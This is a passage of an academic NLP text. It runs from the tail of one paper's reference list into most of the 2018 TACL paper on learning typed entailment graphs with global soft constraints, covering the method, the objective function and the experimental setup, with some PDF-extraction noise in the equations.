Liermann, and Hermann Ney. 1998. Algorithms for bigram and trigram word clustering. Speech communication, 24(1):19–37. Ryan McDonald, Joakim Nivre, Yvonne Quirmbach- Brundage, Yoav Goldberg, Dipanjan Das, Kuzman Ganchev, Keith B. Hall, Slav Petrov, Hao Zhang, Os- car Täckström, Claudia Bedini, Núria B. Castelló, and Jungmee Lee. 2013. Universal dependency annota- tion for multilingual parsing. In Proc. of ACL. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013. Linguistic regularities in continuous space word representations. In Proc. of NAACL. Einat Minkov, Kristina Toutanova, and Hisami Suzuki. 2007. Generating complex morphology for machine translation. In Proc. of ACL. Saif Mohammad, Cody Dunne, and Bonnie Dorr. 2009. Generating high-coverage semantic orientation lexi- cons from overtly marked words and a thesaurus. In Proc. of EMNLP. Robert Moore. 2015. An improved tag dictionary for faster part-of-speech tagging. In Proc. of EMNLP. Thomas Müller and Hinrich Schuetze. 2015. Robust morphological tagging with word representations. In Proceedings of NAACL. Thomas Müller, Helmut Schmid, and Hinrich Schütze. 2013. Efficient higher-order CRFs for morphological tagging. In Proc. of EMNLP. Pradeep Muthukrishnan, Dragomir Radev, and Qiaozhu Mei. 2011. Simultaneous similarity learning and feature-weight learning for document clustering. In Proc. of TextGraphs. Karthik Narasimhan, Regina Barzilay, and Tommi Jaakkola. 2015. An unsupervised method for uncov- ering morphological chains. Transactions of the Asso- ciation for Computational Linguistics, 3:157–167. 14 Garrett Nicolai, Colin Cherry, and Grzegorz Kondrak. 2015. Inflection generation as discriminative string transduction. In Proc. of NAACL. Sonja Nießen and Hermann Ney. 2004. Statistical ma- chine translation with scarce resources using morpho- syntactic information. Computational Linguistics, 30(2). Kemal Oflazer and Ìlker Kuruöz. 1994. Tagging and morphological disambiguation of Turkish text. In Proc. of ANLP. Olutobi Owoputi, Brendan O’Connor, Chris Dyer, Kevin Gimpel, Nathan Schneider, and Noah A. Smith. 2013. Improved part-of-speech tagging for online conversa- tional text with word clusters. In Proc. of NAACL. Tommi A Pirinen. 2011. Modularisation of finnish finite- state language description—towards wide collabora- tion in open source development of a morphological analyser. In Proc. of NODALIDA. Hoifung Poon, Colin Cherry, and Kristina Toutanova. 2009. Unsupervised morphological segmentation with log-linear models. In Proc. of NAACL. Adwait Ratnaparkhi. 1996. A maximum entropy model for part-of-speech tagging. In Proc. of EMNLP. Jesse Read, Bernhard Pfahringer, Geoff Holmes, and Eibe Frank. 2011. Classifier chains for multi-label classification. Machine Learning, 85(3):333–359. Haşim Sak, Tunga Güngör, and Murat Saraçlar. 2008. Turkish language resources: Morphological parser, morphological disambiguator and web corpus. In Proc. of ANLP. Avneesh Saluja and Jirı Navrátil. 2013. Graph-based unsupervised learning of word similarities using het- erogeneous feature types. In Proc. of TextGraphs. Helmut Schmid. 1994. Probabilistic part-of-speech tag- ging using decision trees. In Proc. of the International Conference on New Methods in Language Processing. Kiril Ivanov Simov, Petya Osenova, Sia Kolkovska, Elisaveta Balabanova, and Dimitar Doikoff. 2004. A language resources infrastructure for Bulgarian. In Proc. of LREC. Noah A. Smith, David A. Smith, and Roy W. Tromble. 2005. Context-based morphological disambiguation with random fields. In Proc. of EMNLP. Benjamin Snyder and Regina Barzilay. 2008. Unsuper- vised multilingual learning for morphological segmen- tation. In Proc. of ACL. Radu Soricut and Franz Och. 2015. Unsupervised mor- phology induction using word embeddings. In Proc. of NAACL. Amarnag Subramanya and Jeff Bilmes. 2008. Soft- supervised learning for text classification. In Proc. of EMNLP. Amarnag Subramanya and Partha Pratim Talukdar. 2014. Graph-based semi-supervised learning. Synthesis Lec- tures on Artificial Intelligence and Machine Learning, 8(4). Amarnag Subramanya, Slav Petrov, and Fernando Pereira. 2010. Efficient graph-based semi-supervised learning of structured tagging models. In Proc. of EMNLP. Oscar Täckström, Ryan McDonald, and Jakob Uszkoreit. 2012. Cross-lingual word clusters for direct transfer of linguistic structure. In Proc. of NAACL. Hiroya Takamura, Takashi Inui, and Manabu Okumura. 2007. Extracting semantic orientations of phrases from dictionary. In Proc. of NAACL. Partha Pratim Talukdar and William Cohen. 2013. Scaling graph-based semi-supervised learning to large number of labels using count-min sketch. In Proc. of AISTATS. Partha Pratim Talukdar and Fernando Pereira. 2010. Experiments in graph-based semi-supervised learning methods for class-instance acquisition. In Proc. of ACL. Partha Pratim Talukdar, Derry Wijaya, and Tom Mitchell. 2012. Acquiring temporal constraints between rela- tions. In Proc. of CIKM. Michael Thelen and Ellen Riloff. 2002. A bootstrapping method for learning semantic lexicons using extraction pattern contexts. In Proc. of ACL. Viktor Trón, Péter Halácsy, Péter Rebrus, András Rung, Péter Vajda, and Eszter Simon. 2006. Morphdb.hu: Hungarian lexical database and morphological gram- mar. In Proc. of LREC. Grigorios Tsoumakas and Ioannis Katakis. 2006. Multi- label classification: An overview. Dept. of Informat- ics, Aristotle University of Thessaloniki, Greece. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proc. of ACL. Jakob Uszkoreit and Thorsten Brants. 2008. Distributed word clustering for large scale class-based language modeling in machine translation. In Proc. of ACL. Leonid Velikovich, Sasha Blair-Goldensohn, Kerry Han- nan, and Ryan McDonald. 2010. The viability of web- derived polarity lexicons. In Proc. of NAACL. Fei Wang, Shijun Wang, Changshui Zhang, and Ole Winther. 2007. Semi-supervised mean fields. In Proc. of AISTATS. Kilian Q. Weinberger, John Blitzer, and Lawrence K. Saul. 2005. Distance metric learning for large mar- gin nearest neighbor classification. In Proc. of NIPS. Richard Wicentowski. 2004. Multilingual noise-robust supervised morphological analysis using the word- frame model. In Proc. of SIGPHON. 15 David Yarowsky and Richard Wicentowski. 2000. Min- imally supervised morphological analysis by multi- modal alignment. In Proc. of ACL. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proc. of ACL. Yi Zhang and Jeff G. Schneider. 2011. Multi-label output codes using canonical correlation analysis. In Proc. of AISTATS. Min-Ling Zhang and Zhi-Hua Zhou. 2005. A k-nearest neighbor based algorithm for multi-label classifica- tion. In Proc. of IEEE Conference on Granular Com- puting. Xiaojin Zhu. 2005. Semi-supervised Learning with Graphs. Ph.D. thesis, Carnegie Mellon University, Pittsburgh, PA, USA. AAI3179046. 16 work_4oaheysiu5hhvapo7iqe4q6yq4 ---- Edinburgh Research Explorer Learning Typed Entailment Graphs with Global Soft Constraints Citation for published version: Hosseini, SMJ, Chambers, N, Reddy, S, Holt, XR, Cohen, S, Johnson, M & Steedman, M 2018, 'Learning Typed Entailment Graphs with Global Soft Constraints', Transactions of the Association for Computational Linguistics, vol. 6, pp. 703-717. https://doi.org/10.1162/tacl_a_00250 Digital Object Identifier (DOI): 10.1162/tacl_a_00250 Link: Link to publication record in Edinburgh Research Explorer Document Version: Peer reviewed version Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://doi.org/10.1162/tacl_a_00250 https://doi.org/10.1162/tacl_a_00250 https://www.research.ed.ac.uk/portal/en/publications/learning-typed-entailment-graphs-with-global-soft-constraints(f9e6cde4-6adb-4f78-aeab-44ff87367405).html Learning Typed Entailment Graphs with Global Soft Constraints Mohammad Javad Hosseini?§ Nathanael Chambers?? Siva Reddy† Xavier R. Holt‡ Shay B. Cohen? Mark Johnson‡ and Mark Steedman? ?University of Edinburgh §The Alan Turing Institute, UK ??United States Naval Academy †Stanford University ‡Macquarie University javad.hosseini@ed.ac.uk, nchamber@usna.edu, sivar@stanford.edu {xavier.ricketts-holt,mark.johnson}@mq.edu.au {scohen,steedman}@inf.ed.ac.uk Abstract This paper presents a new method for learn- ing typed entailment graphs from text. We extract predicate-argument structures from multiple-source news corpora, and compute local distributional similarity scores to learn entailments between predicates with typed arguments (e.g., person contracted disease). Previous work has used transitivity con- straints to improve local decisions, but these constraints are intractable on large graphs. We instead propose a scalable method that learns globally consistent similarity scores based on new soft constraints that consider both the structures across typed entailment graphs and inside each graph. Learning takes only a few hours to run over 100K predicates and our results show large im- provements over local similarity scores on two entailment datasets. We further show improvements over paraphrases and entail- ments from the Paraphrase Database, and prior state-of-the-art entailment graphs. We show that the entailment graphs improve performance in a downstream task. 1 Introduction Recognizing textual entailment and paraphrasing is critical to many core natural language process- ing applications such as question-answering and semantic parsing. The surface form of a sentence that answers a question such as “Does Verizon own Yahoo?” frequently does not directly cor- respond to the form of the question, but is rather a paraphrase or an expression such as “Verizon bought Yahoo”, that entails the answer. The lack of a well-established form-independent semantic representation for natural language is the most im- portant single obstacle to bridging the gap between queries and text resources. This paper seeks to learn meaning postulates (e.g., buying entails owning) that can be used to t3=person,t4=location visit arrive in leave Leave for t1=company,t2=company own 's acquisition of buy Figure 1: Examples of typed entailment graphs for arguments of types company,company and per- son,location. augment the standard form-dependent semantics. Our immediate goal is to learn entailment rules be- tween typed predicates with two arguments, where the type of each predicate is determined by the types of its arguments. We construct typed entail- ment graphs, with typed predicates as nodes and entailment rules as edges. Figure 1 shows simple examples of such graphs with arguments of types company,company and person,location. Entailment relations are detected by computing a similarity score between the typed predicates based on the distributional inclusion hypothesis, which states that a word (predicate) u entails an- other word (predicate) v if in any context that u can be used so can be v (Dagan et al., 1999; Gef- fet and Dagan, 2005; Herbelot and Ganesalingam, 2013; Kartsaklis and Sadrzadeh, 2016). Most pre- vious work has taken a “local learning” approach (Lin, 1998; Weeds and Weir, 2003; Szpektor and Dagan, 2008; Schoenmackers et al., 2010), i.e., learning entailment rules independently from each other. One problem facing local learning approaches is that many correct edges are not identified be- cause of data sparsity and many wrong edges are spuriously identified as valid entailments. A “global learning” approach, where dependencies between entailment rules are taken into account, can improve the local decisions significantly. Be- rant et al. (2011) imposed transitivity constraints on the entailments, such that the inclusion of rules i→j and j→k implies that of i→k. While they showed transitivity constraints to be effective in learning entailment graphs, the Integer Linear Pro- gramming (ILP) solution of Berant et al. (2011) is not scalable beyond a few hundred nodes. In fact, the problem of finding a maximally weighted transitive subgraph of a graph with arbitrary edge weights is NP-hard (Berant et al., 2011). This paper instead proposes a scalable solution that does not rely on transitivity closure, but in- stead uses two global soft constraints that main- tain structural similarity both across and within each typed entailment graph (Figure 2). We intro- duce an unsupervised framework to learn globally consistent similarity scores given local similarity scores (§4). Our method is highly parallelizable and takes only a few hours to apply to more than 100K predicates.1,2 Our experiments (§6) show that the global scores improve significantly over local scores and outperform state-of-the-art entailment graphs on two standard entailment rule datasets (Berant et al., 2011; Holt, 2018). We ultimately intend the typed entailment graphs to provide a resource for entailment and paraphrase rules for use in seman- tic parsing and open domain question-answering, as has been done for similar resources such as the Paraphrase Database (PPDB; Ganitkevitch et al., 2013; Pavlick et al., 2015) in Wang et al. (2015); Dong et al. (2017).3 With that end in view, we have included a comparison with PPDB in our evaluation on the entailment datasets. We also show that the learned entailment rules improve performance on a question-answering task (§7) with no tuning or prior knowledge of the task. 2 Related Work Our work is closely related to Berant et al. (2011), where entailment graphs are learned by imposing transitivity constraints on the entailment relations. However, the exact solution to the problem is not scalable beyond a few hundred predicates, while the number of predicates that we capture is two orders of magnitude larger (§5). Hence, it is nec- essary to resort to approximate methods based on 1We performed our experiments on a 32-core 2.3 GHz machine with 256GB of RAM. 2Our code, extracted binary relations and the learned entailment graphs are available at https://github.com/mjhosseini/entGraph. 3Predicates inside each clique in the entailment graphs are considered to be paraphrases. assumptions concerning the graph structure. Be- rant et al. (2012) and Berant et al. (2015) propose Tree-Node-Fix (TNF), an approximation method that scales better by additionally assuming the en- tailment graphs are “Forest Reducible", where a predicate cannot entail two (or more) predicates j and k such that neither j→k nor k→j (FRG as- sumption). However, the FRG assumption is not correct for many real-world domains. For exam- ple, a person visiting a place entails both arriving at that place and leaving that place, while the lat- ter do not necessarily entail each other. Our work injects two other types of prior knowledge about the structure of the graph that are less expensive to incorporate and yield better results on entailment rule datasets. Abend et al. (2014) learn entailment relations over multi-word predicates with different levels of compositionality. Pavlick et al. (2015) add variety of relations, including entailment, to phrase pairs in PPDB. This includes a broader range of entail- ment relations such as lexical entailment. In con- trast to our method, these works rely on supervised data and take a local learning approach. Another related strand of research is link pre- diction (Socher et al., 2013; Bordes et al., 2013; Riedel et al., 2013; Yang et al., 2015; Trouil- lon et al., 2016; Dettmers et al., 2018), where the source data are extractions from text, facts in knowledge bases, or both. Unlike our work, which directly learns entailment relations between pred- icates, these methods aim at predicting the source data, i.e., whether two entities have a particular relationship. The common wisdom is that en- tailment relations are by-product of these meth- ods (Riedel et al., 2013). However, this assump- tion has not usually been explicitly evaluated. Explicit entailment rules provide explainable re- sources that can be used in downstream tasks. Our experiments show that our method signifi- cantly outperforms a state-of-the-art link predic- tion method. 3 Computing Local Similarity Scores We first extract binary relations as predicate- argument pairs using a Combinatory Categorial Grammar (CCG; Steedman, 2000) semantic parser (§3.1). We map the arguments to their Wikipedia URLs using a named entity linker (§3.2). We ex- tract types such as person and disease for each ar- gument (§3.2). We then compute local similarity scores between predicate pairs (§3.3). 3.1 Relation Extraction The semantic parser of Reddy et al. (2014), GraphParser, is run on the NewsSpike corpus (Zhang and Weld, 2013) to extract binary re- lations between a predicate and its arguments from sentences. GraphParser uses CCG syn- tactic derivations and λ-calculus to convert sen- tences to neo-Davisonian semantics, a first-order logic that uses event identifiers (Parsons, 1990). For example, for the sentence, Obama visited Hawaii in 2012, GraphParser produces the logi- cal form ∃e.visit1(e, Obama)∧visit2(e, Hawaii)∧ visitin(e, 2012), where e denotes an event. We will consider a relation for each pair of ar- guments, hence, there will be three rela- tions for the above sentence: visit1,2 with ar- guments (Obama,Hawaii), visit1,in with argu- ments (Obama,2012) and visit2,in with arguments (Hawaii,2012). We currently only use extracted relations that involve two named entities or one named entity and a noun. We constrain the rela- tions to have at least one named entity to reduce ambiguity in finding entailments. We perform a few automatic post-processing steps on the output of the parser. First, we normal- ize the predicates by lemmatization of their head words. Passive predicates are mapped to active ones and we extract negations and particle verb predicates. Next, we discard unary relations and relations involving coordination of arguments. Fi- nally, whenever we see a relation between a sub- ject and an object, and a relation between object and a third argument connected by a prepositional phrase, we add a new relation between the subject and the third argument by concatenating the rela- tion name with the object. For example, for the sentence China has a border with India, we ex- tract a relation have border1,with between China and India. We perform a similar process for PPs attached to VPs. Most of the light verbs and multi- word predicates will be extracted by the above post-processing (e.g., take care1,of ) which will re- cover many salient ternary relations. While entailments and paraphrasing can bene- fit from n-ary relations, e.g., person visits a lo- cation in a time, we currently follow previous work (Lewis and Steedman, 2013a; Berant et al., 2015) in confining our attention to binary rela- tions, leaving the construction of n-ary graphs to future work. 3.2 Linking and Typing Arguments Entailment and paraphrasing depend on context. While using exact context is impractical in form- ing entailment graphs, many authors have used the type of the arguments to disambiguate polysemous predicates (Berant et al., 2011, 2015; Lewis and Steedman, 2013a; Lewis, 2014). Typing also re- duces the size of the entailment graphs. Since named entities can be referred to in many different ways, we use a named entity linking tool to normalize the named entities. In the ex- periments below, we use AIDALight (Nguyen et al., 2014), a fast and accurate named entity linker, to link named entities to their Wikipedia URLs (if any). We thus type all entities that can be grounded in Wikipedia. We first map the Wikipedia URL of the entities to Freebase (Bol- lacker et al., 2008). We select the most notable type of the entity from Freebase and map it to FIGER types (Ling and Weld, 2012) such as build- ing, disease, person and location, using only the first level of the FIGER type hierarchy.4 For exam- ple, instead of event/sports_event, we use event as type. If an entity cannot be grounded in Wikipedia or its Freebase type does not have a mapping to FIGER, we assign the default type thing to it. 3.3 Local Distributional Similarities For each typed predicate (e.g., visit1,2 with types person,location), we extract a feature vector. We use as feature types the set of argument pair strings (e.g., Obama-Hawaii) that instantiate the binary relations of the predicates. The value of each fea- ture is the pointwise mutual information (PMI) be- tween the predicate and the feature. We use the feature vectors to compute three local similarity scores (both symmetric and directional) between typed predicates: Weeds (Weeds and Weir, 2003), Lin (Lin, 1998), and Balanced Inclusion (BInc; Szpektor and Dagan, 2008) similarities. 4 Learning Globally Consistent Entailment Graphs We learn globally consistent similarity scores based on local similarity scores. The global scores will be used to form typed entailment graphs. 449 types out of 113 FIGER types 4.1 Problem Formulation Let T be a set of types and P be a set of predicates. We denote by V̄ (t1, t2) the set of typed predicates p(:t1, :t2), where t1, t2 ∈ T and p ∈ P . Each p(:t1, :t2) ∈ V̄ (t1, t2) takes as input arguments of types t1 and t2. An example of a typed predicate is win1,2(:team,:event) that can be instantiated with win1,2(Seahawks:team,Super Bowl:event). We define V (t1, t2) = V̄ (t1, t2) ∪ V̄ (t2, t1). We often denote elements of V (t1, t2) by i, j and k, where each element is a typed predicate as above. For an i=p(:t1, :t2) ∈ V (t1, t2), we denote by π(i)=p, τ1(i)=t1 and τ2(i)=t2. We compute distributional similarities between predi- cates with the same argument types. We denote by W0(t1, t2) ∈ [0, 1]|V (t1,t2)|×|V (t1,t2)| the (sparse) matrix containing all local similarity scores w0ij between predicates i and j with types t1 and t2, where |V (t1, t2)| is the size of V (t1, t2).5 Predicates can entail each other with the same argument order (direct) or in the reverse order, i.e., p(:t1, :t2) might entail q(:t1, :t2) or q(:t2, :t1). For the graphs with the same types (e.g., t1=t2=person), we keep two copies of the pred- icates one for each of the possible orderings. This allows us to model entailments with reverse argu- ment orders, e.g., is son of1,2(:person1,:person2) → is parent of1,2(:person2,:person1). We define V = ⋃ t1,t2 V (t1, t2), the set of all typed predicates, and W0 as a block- diagonal matrix consisting of all the local sim- ilarity matrices W0(t1, t2). Similarly, we de- fine W(t1, t2) and W as the matrices consisting of globally consistent similarity scores wij we wish to learn. The global similarity scores are used to form entailment graphs by thresholding W. For a δ > 0, we define typed entailment graphs as Gδ(t1, t2) = ( V (t1, t2),Eδ(t1, t2) ) , where V (t1, t2) are the nodes and E(t1, t2) = {(i,j)|i,j ∈ V (t1, t2),wij ≥ δ} are the edges of the entailment graphs. 4.2 Learning Algorithm Existing approaches to learn entailment graphs from text miss many correct edges because of data sparsity, i.e., the lack of explicit evidence in the corpus that a predicate i entails another predicate j. The goal of our method is to use evidence 5For each similarity measure, we define one separate ma- trix and run the learning algorithm separately, but for simplic- ity of notation, we do not show the similarity measure names. t3=living_thing,t4=diseaset1=government_agency,t2=event !(trigger,(t1,t2),(t3,t4)) t5=medicine,t6=disease(B) treat cause cure useful for trigger cause trigger (A) Figure 2: Learning entailments that are consistent (A) across different but related typed entailment graphs and (B) within each graph. 0 ≤ β ≤ 1 determines how much different graphs are related. The dotted edges are missing, but will be recovered by considering relation- ships shown by across-graph (red) and within-graph (light blue) connections. from the existing edges that have been assigned high confidence to predict missing ones, and re- move spurious edges. We propose two global soft constraints that maintain structural similarity both across and within each typed entailment graph. The constraints are based on the following two ob- servations. First, it is standard to learn a separate typed en- tailment graph for each (plausible) type-pair be- cause arguments provide necessary disambigua- tion for predicate meaning (Berant et al., 2011, 2012; Lewis and Steedman, 2013a,b; Berant et al., 2015). However, many entailment relations for which we have direct evidence only in a few sub- graphs may in fact apply over many others (Fig- ure 2A). For example, we may not have found di- rect evidence that mentions of a living_thing (e.g., a virus) triggering a disease are accompanied by mentions of the living_thing causing that disease (because of data sparsity), whereas we have found that mentions of a government_agency triggering an event are reliably accompanied by mentions of causing that event. While we show that typing is necessary to learning entailments (§6), we propose to learn all typed entailment graphs jointly. Second, we encourage paraphrase predicates (where i→j and j→i) to have the same patterns of entailment (Figure 2B), i.e. to entail and be entailed by the same predicates, global soft con- straints that we call paraphrase resolution. Using these soft constraint, a missing entailment (e.g., medicine treats disease → medicine is useful for disease) can be identified by considering the en- J(W ≥ 0, ~β ≥ 0) = LwithinGraph + LcrossGraph + LpResolution + λ1‖W‖1 (1) LwithinGraph = ∑ i,j∈V (wij −w0ij) 2 (2) LcrossGraph = 1 2 ∑ i,j∈V ∑ (i′,j′)∈ N(i,j) β ( π(i), ( τ1(i),τ2(i) ) , ( τ1(i ′),τ2(i ′) )) (wij −wi′j′ )2 + λ2 2 ‖~1 − ~β‖22 (3) LpResolution = 1 2 ∑ t1,t2∈T ∑ i,j,k∈V (t1,t2) k 6=i,k 6=j Iε(wij)Iε(wji) [ (wik −wjk)2 + (wki −wkj)2 ] (4) Figure 3: The objective function to jointly learn global scores W and the compatibility function β, given local scores W0. LwithinGraph encourages global and local scores to be close; LcrossGraph encourages similarities to be consistent between different typed entailment graphs; LpResolution encourages paraphrase predicates to have the same pattern of entailment. We use an `1 regularization penalty to remove entailments with low confidence. tailments of a paraphrase predicate (e.g., medicine cures disease → medicine is useful for disease). Sharing entailments across different typed en- tailment graphs is only semantically correct for some predicates and types. In order to learn when we can generalize an entailment from one graph to another, we define a compatibility func- tion β : P × (T×T) × (T×T) → [0, 1]. The function is defined for a predicate and two type pairs (Figure 2A). It specifies the extent of com- patibility for a single predicate between different typed entailment graphs, with 1 being completely compatible and 0 being irrelevant. In particu- lar β ( p, (t1, t2), (t ′ 1, t ′ 2) ) determines how much we expect the outgoing edges of p(:t1, :t2) and p(:t′1, :t ′ 2) to be similar. We constrain β to be sym- metric between t1, t2 and t′1, t ′ 2 as compatibility of outgoing edges of p(:t1, :t2) with p(:t′1, :t ′ 2) should be the same as p(:t′1, :t ′ 2) with p(:t1, :t2). We de- note by ~β, a vectorization consisting of the values of β for all possible input predicates and types. Note that the global similarity scores W and the compatibility function ~β are not known in ad- vance. Given local similarity scores W0, we learn W and ~β jointly. We minimize the loss func- tion defined in Eq. 1 which consists of three soft constraints defined below and an `1 regularization term (Figure 3). LwithinGraph. Eq. 2 encourages global scores wij to be close to local scores w0ij, so that the global scores will not stray too far from the origi- nal scores. LcrossGraph. Eq. 3 encourages each predicate’s entailments to be similar across typed entailment graphs (Figure 2A) if the predicates have similar neighbors. We penalize the difference of entail- ments in two different graphs, when the compat- ibility function is high. For each pair of typed predicates (i,j) ∈ V (t1, t2), we define a set of neighbors (predicates with different types): N(i,j) = { (i′,j′) ∈ V (t′1, t ′ 2)|t ′ 1, t ′ 2 ∈ T, (i′,j′) 6= (i,j),π(i) = π(i′),π(j) = π(j′), a(i,j) = a(i′,j′) } , (5) where a(i,j) is true if the argument orders of i and j match, and false otherwise. For each (i′,j′) ∈ N(i,j), we penalize the difference of entailments by adding the term β(·)(wij − wi′j′ )2. We add a prior term on ~β as λ2‖~1−~β‖22, where ~1 is a vector of the same size as ~β with all 1s. Without the prior term (i.e., λ2=0), all the elements of ~β will be- come zero. Increasing λ2 will keep (some of the) elements of ~β non-zero and encourages communi- cations between related graphs. LpResolution. Eq. 4 denotes the paraphrase reso- lution global soft constraints that encourage para- phrase predicates to have the same patterns of en- tailments (Figure 2B). The function Iε(x) equals x if x > ε and zero, otherwise.6 Unlike LcrossGraph in Eq. 3, Eq. 4 operates on the edges within each graph. If both wij and wji are high, their incoming and outgoing edges from/to nodes k are encour- aged to be similar. We name this global constraint, 6In our experiments, we set ε = .3. Smaller values of ε yield similar results, but learning is slower. paraphrase resolution, since it might add missing links (e.g., i→k) if i and j are paraphrases of each other and j→k, or break the paraphrase relation, if the incoming and outgoing edges are very dif- ferent. We impose an `1 penalty on the elements of W as λ1‖W‖1, where λ1 is a nonnegative tuning hyperparameter that controls the strength of the penalty applied to the elements of W. This term removes entailments with low confidence from the entailment graphs. Note that Eq. 1 has W0 and average of W0 across different typed entailment graphs (§5.4) as its special cases. The former is achieved by setting λ1=λ2=0 and ε=1 and the lat- ter by λ1=0, λ2=∞ and ε=1. We do not explicitly weight the different components of the loss func- tion, as the effect of LcrossGraph and LpResolution can be controlled by λ2 and ε, respectively. Eq. 1 can be interpreted as an inference prob- lem in a Markov Random Field (MRF) (Kinder- mann and Snell, 1980), where the nodes of the MRF are the global scores wij and the parame- ters β ( p, (t1, t2), (t ′ 1, t ′ 2) ) . The MRF will have five log-linear factor types: one unary factor type for LwithinGraph, one three-variable factor type for the first term of LcrossGraph and a unary factor type for the prior on ~β, one four-variable factor type for LpResolution and a unary factor type for the `1 regularization term. Figure 2 shows an example factor graph (unary factors are not shown for sim- plicity). We learn W and ~β jointly using a message passing approach based on the Block Coordinate Descent method (Xu and Yin, 2013) . We ini- tialize W = W0. Assuming that we know the global similarity scores W, we learn how much the entailments are compatible between different types (~β) and vice versa. Given W fixed, each wij sends messages to the corresponding β(·) el- ements, which will be used to update ~β. Given ~β fixed, we do one iteration of learning for each wij. Each β(·) and wij elements send messages to the related elements in W, which will be in turn up- dated. Based on the update rules (Appendix A), we always have wij ≤ 1 and ~β ≤~1. Each iteration of the learning method takes O ( ‖W‖0|T|2 + ∑ i∈V (‖wi:‖0+‖w:i‖0) 2 ) time, where ‖W‖0 is the number of nonzero elements of W (number of edges in the current graph), |T| is the number of types and ‖wi:‖0 (‖w:i‖0) is the number of nonzero elements of the ith row (col- umn) of the matrix (out-degree and in-degree of the node i).7 In practice, learning converges af- ter 5 iterations of full updates. The method is highly parallelizable, and our efficient implemen- tation does the learning in only a few hours. 5 Experimental Setup We extract binary relations from a multiple-source news corpus (§5.1) and compute local and global scores. We form entailment graphs based on the similarity scores and test our model on two entail- ment rules datasets (§5.2). We then discuss pa- rameter tuning (§5.3) and baseline systems (§5.4). 5.1 Training Corpus: Multiple-Source News We use the multiple-source NewsSpike corpus of Zhang and Weld (2013). NewsSpike was deliber- ately built to include different articles from differ- ent sources describing identical news stories. They scraped RSS news feeds from January-February 2013 and linked them to full stories collected through a web search of the RSS titles. The cor- pus contains 550K news articles (20M sentences). Since this corpus contains multiple sources cover- ing the same events, it is well-suited to our purpose of learning entailment and paraphrase relations. We extracted 29M binary relations using the procedure in Section 3.1. In our experiments, we used two cutoffs within each typed subgraph to re- duce the effect of noise in the corpus: (1) remove any argument-pair that is observed with less than C1=3 unique predicates; (2) remove any predi- cate that is observed with less than C2=3 unique argument-pairs. This leaves us with |P |=101K unique predicates in 346 entailment graphs. The maximum graph size is 53K nodes8 and the to- tal number of non-zero local scores in all graphs is 66M. In the future, we plan to test our method on an even larger corpus, but preliminary exper- iments suggest that data sparsity will persist re- gardless of the corpus size, due to the power law distribution of the terms. We compared our ex- tractions qualitatively with Stanford Open IE (Et- zioni et al., 2011; Angeli et al., 2015). Our CCG- based extraction generated noticeably better rela- 7In our experiments, the total number of edges is ≈ .01|V |2 and most of predicate pairs are seen in less than 20 subgraphs, instead of |T|2. 8There are 4 graphs with more than 20K nodes, 3 graphs with 10K to 20K nodes, and 16 graphs with 1K to 10K nodes. tions for longer sentences with long-range depen- dencies such as those involving coordination. 5.2 Evaluation Entailment Datasets Levy/Holt’s Entailment Dataset Levy and Da- gan (2016) proposed a new annotation method (and a new dataset) for collecting relational in- ference data in context. Their method removes a major bias in other inference datasets such as Zeichner’s (Zeichner et al., 2012), where candi- date entailments were selected using a directional similarity measure. Levy & Dagan form ques- tions of the type which city (qtype), is located near (qrel), mountains (qarg)? and provide possible an- swers of the form Kyoto (aanswer), is surrounded by (arel), mountains (aarg). Annotators are shown a question with multiple possible answers, where aanswer is masked by qtype to reduce the bias to- wards world knowledge. If the annotator indicates the answer as True (False), it is interpreted that the predicate in the answer entails (does not entail) the predicate in the question. While the Levy entailment dataset removes bias, a recent evaluation identified high labeling error rate for entailments that hold only in one di- rection (Holt, 2018). Holt analyzed 150 positive examples and showed that 33% of the claimed en- tailments are correct only in the opposite direc- tion, while 15% do not entail in any direction. Holt (2018) designed a task to crowd-annotate the dataset by a) adding the reverse entailment (q→a) for each original positive entailment (a→q) in Levy’s dataset; and b) directly asking the an- notators if a positive example (or its reverse) is an entailment or not (as opposed to relying on a factoid question). We test our method on this re- annotated dataset of 18,407 examples (3,916 pos- itive and 14,491 negative), which we refer to as Levy/Holt.9 We run our CCG based binary rela- tion extraction on the examples and perform our typing procedure (§3.2) on aanswer (e.g., Kyoto) and aarg (e.g., mountains) to find the types of the arguments. We split the re-annotated dataset into dev (30%) and test (70%) such that all the exam- ples with the same qtype and qrel are assigned to only one of the sets. Berant’s Entailment Dataset Berant et al. (2011) annotated all the edges of 10 typed entail- ment graphs based on the predicates in their cor- pus. The dataset contains 3,427 edges (positive), 9www.github.com/xavi-ai/relational-implication-dataset and 35,585 non-edges (negative). We evaluate our method on all the examples of Berant’s entailment dataset. The types of this dataset do not match with FIGER types, but we perform a simple hand- mapping between their types and FIGER types.10 5.3 Parameter Tuning We selected λ1=.01 and ε=.3 based on prelim- inary experiments on the dev set of Levy/Holt’s dataset. The hyperparameter λ2 is selected from {0, 0.01, 0.1, 0.5, 1, 1.5, 2, 10,∞}.11 We do not tune λ2 for Berant’s dataset. We instead use the selected value based on the Levy/Holt dev set. In all our experiments, we remove any local score w0ij < .01. We show precision-recall curves by changing the threshold δ on the similarity scores. 5.4 Comparison We test our model by ablation of the global soft constraints LcrossGraph and LpResolution, testing simple baselines to resolve sparsity and compar- ing to the state-of-the-art resources. We also com- pare with two distributional approaches that can be used to predict predicate similarity. We com- pare the following models and resources. CG_PR is our novel model with both global soft constraints LcrossGraph and LpResolution. CG is our model without LpResolution. Local is the lo- cal distributional similarities without any change. AVG is the average of local scores across all the entailment graphs that contain both predicates in an entailment of interest. We set λ2 = ∞ which forces all the values of ~β to be 1, hence resulting in a uniform average of local scores. Untyped scores are local scores learned without types. We set the cutoffs C1=20 and C2=20 to have a graph with total number of edges similar to the typed entail- ment graphs. ConvE scores are cosine similarities of low- dimensional predicate representations learned by ConvE (Dettmers et al., 2018), a state-of-the-art model for link prediction. ConvE is a multi-layer convolutional network model that is highly pa- rameter efficient. We learn 200-dimensional vec- tors for each predicate (and argument) by apply- ing ConvE to the set of extractions of the above untyped graph. We learned embeddings for each 